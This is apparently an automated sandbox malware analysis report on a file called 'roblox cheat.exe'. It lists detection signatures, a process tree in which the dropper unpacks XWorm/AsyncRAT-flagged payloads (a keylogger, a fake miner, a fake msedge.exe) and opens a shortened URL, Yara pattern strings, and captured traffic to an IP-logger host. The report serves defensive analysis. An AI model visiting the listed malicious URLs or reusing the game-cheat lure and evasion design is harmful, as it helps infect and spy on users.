Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
roblox cheat.exe

Overview

General Information

Sample name:roblox cheat.exe
Analysis ID:1484380
MD5:6b94734feac8edb9f925385163ad59c9
SHA1:3ec9cc36f11ce7836e86089631ad790e7c8fe3cc
SHA256:62d6f204244bbb976a155aa7750874a56db925c8531d76dce6bf5560440cb63c
Tags:exe
Infos:

Detection

XWorm
Score:90
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Contains functionality to log keystrokes (.Net Source)
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect virtualization through RDTSC time measurements
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • roblox cheat.exe (PID: 1952 cmdline: "C:\Users\user\Desktop\roblox cheat.exe" MD5: 6B94734FEAC8EDB9F925385163AD59C9)
    • robloxPX1instaler.exe (PID: 4948 cmdline: "C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe" MD5: 27469372591B14FF1C57654FACB5E020)
    • cheatinstaler cheatinstalerF6R54T.exe (PID: 7156 cmdline: "C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe" MD5: FC411F4D9F4DBA5104CB1549153A8684)
      • cmd.exe (PID: 7200 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\coin.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 7324 cmdline: cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chrome.exe (PID: 7444 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/24RXx6 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
          • chrome.exe (PID: 7716 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1860 --field-trial-handle=1928,i,13588240422126798521,8416605528282741341,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\BitCoin_miner.exeJoeSecurity_XWormYara detected XWormJoe Security
    C:\Users\user\AppData\Local\Temp\BitCoin_miner.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x7df8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x7e95:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x7faa:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x7aa6:$cnc4: POST / HTTP/1.1
    C:\Users\user\AppData\Local\Temp\ msedge.exeJoeSecurity_XWormYara detected XWormJoe Security
      C:\Users\user\AppData\Local\Temp\ msedge.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x7df8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x7e95:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x7faa:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x7aa6:$cnc4: POST / HTTP/1.1
      C:\Users\user\AppData\Local\Temp\Keyloger.exeJoeSecurity_XWormYara detected XWormJoe Security
        Click to see the 1 entries

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000003.00000003.1356335250.00000228251A3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
          00000003.00000003.1356335250.00000228251A3000.00000004.00000020.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x8be8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x8c85:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x8d9a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x8896:$cnc4: POST / HTTP/1.1
          Process Memory Space: cheatinstaler cheatinstalerF6R54T.exe PID: 7156JoeSecurity_XWormYara detected XWormJoe Security

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            No Snort rule has matched

            Suricata Signatures

            Timestamp:2024-07-30T00:54:42.469428+0200
            SID:2022930
            Source Port:443
            Destination Port:49712
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-30T00:55:19.729239+0200
            SID:2022930
            Source Port:443
            Destination Port:60764
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: roblox cheat.exeAvira: detected
            Antivirus detection for URL or domain
            Source: https://2no.co/24RXx6HAvira URL Cloud: Label: malware
            Source: https://2no.co/Avira URL Cloud: Label: malware
            Source: https://2no.co/redirect-2Avira URL Cloud: Label: malware
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exeAvira: detection malicious, Label: TR/Spy.Gen
            Source: C:\Users\user\AppData\Local\Temp\ msedge.exeAvira: detection malicious, Label: TR/Spy.Gen
            Source: C:\Users\user\AppData\Local\Temp\Keyloger.exeAvira: detection malicious, Label: TR/Spy.Gen
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\ msedge.exeReversingLabs: Detection: 76%
            Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exeReversingLabs: Detection: 76%
            Source: C:\Users\user\AppData\Local\Temp\Keyloger.exeReversingLabs: Detection: 81%
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeReversingLabs: Detection: 60%
            Multi AV Scanner detection for submitted file
            Source: roblox cheat.exeReversingLabs: Detection: 60%
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\ msedge.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\Keyloger.exeJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: roblox cheat.exeJoe Sandbox ML: detected
            Source: roblox cheat.exe, 00000000.00000000.1339003894.0000000000912000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_dcd03e6b-2
            Source: roblox cheat.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.9:49712 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.9:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.9:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.9:60764 version: TLS 1.2
            Source: roblox cheat.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\buildAgent\work\ci_deploy_ninja_boot-x86_git\build.ninja\common\vs2019\x86\release\Installer\Windows\RobloxPlayerInstaller.pdb source: roblox cheat.exe, robloxPX1instaler.exe.0.dr
            Source: Binary string: \rat\BitJoiner\payload\obj\Debug\payload.pdb source: roblox cheat.exe
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: roblox cheat.exe, cheatinstaler cheatinstalerF6R54T.exe.0.dr
            Source: Binary string: zserialNumbersignatureissuervaliditysubjectissuerUIDsubjectUIDextensionsX509_CINFcert_infosig_algX509CERTIFICATEcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: roblox cheat.exe, robloxPX1instaler.exe.0.dr
            Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: roblox cheat.exe, robloxPX1instaler.exe.0.dr
            Source: Binary string: serialNumbersignatureissuervaliditysubjectissuerUIDsubjectUIDextensionsX509_CINFcert_infosig_algX509CERTIFICATEcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: robloxPX1instaler.exe, 00000002.00000002.3209096331.0000000000D68000.00000002.00000001.01000000.00000006.sdmp, robloxPX1instaler.exe, 00000002.00000000.1344820205.0000000000D68000.00000002.00000001.01000000.00000006.sdmp
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF75456B190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,3_2_00007FF75456B190
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF7545540BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,3_2_00007FF7545540BC
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF75457FCA0 FindFirstFileExA,3_2_00007FF75457FCA0
            Source: global trafficTCP traffic: 192.168.2.9:60760 -> 1.1.1.1:53
            Source: Joe Sandbox ViewIP Address: 88.212.201.198 88.212.201.198
            Source: Joe Sandbox ViewIP Address: 104.21.79.229 104.21.79.229
            Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
            Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
            Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
            Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
            Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
            Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
            Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=USNpFfLxfLR8zud&MD=tboVBsUh HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
            Source: global trafficHTTP traffic detected: GET /24RXx6 HTTP/1.1Host: 2no.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /redirect/handshake.png HTTP/1.1Host: cdn.iplogger.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://2no.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /hit?t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.7654828449535682 HTTP/1.1Host: counter.yadro.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://2no.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.7654828449535682 HTTP/1.1Host: counter.yadro.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://2no.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: FTID=1cg1sr1pFper1cg1sr001FMX
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: cdn.iplogger.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://2no.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.7654828449535682 HTTP/1.1Host: counter.yadro.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: FTID=1cg1sr1pFper1cg1sr001FMX; VID=2DNPIG0nbdur1cg1ss001FSz
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: cdn.iplogger.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
            Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=USNpFfLxfLR8zud&MD=tboVBsUh HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
            Source: global trafficDNS traffic detected: DNS query: ecsv2.roblox.com
            Source: global trafficDNS traffic detected: DNS query: clientsettingscdn.roblox.com
            Source: global trafficDNS traffic detected: DNS query: 2no.co
            Source: global trafficDNS traffic detected: DNS query: cdn.iplogger.org
            Source: global trafficDNS traffic detected: DNS query: counter.yadro.ru
            Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
            Source: global trafficDNS traffic detected: DNS query: www.google.com
            Source: unknownHTTP traffic detected: POST /report/v4?s=CPqke8krabWr3I%2B0nQZrM2XBTRh85vl2pABTFNCSidoCLsuM%2FwVtGNU4ahZho4qN%2FuYUTKxo7XbgrVq19ZYo%2BAluOfIfzCfoAkvjHeJWNGUJK1LfDJpl%2BO7HYJ7smmPZAP9B HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 422Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 29 Jul 2024 22:54:44 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: http://bit.ly/1eMQ42U
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: robloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
            Source: robloxPX1instaler.exe, 00000002.00000003.1360804950.0000000001D26000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001D25000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001CF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: robloxPX1instaler.exe, 00000002.00000003.1360804950.0000000001D26000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001D25000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001C69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl
            Source: robloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl
            Source: robloxPX1instaler.exe, 00000002.00000003.1360804950.0000000001D26000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl
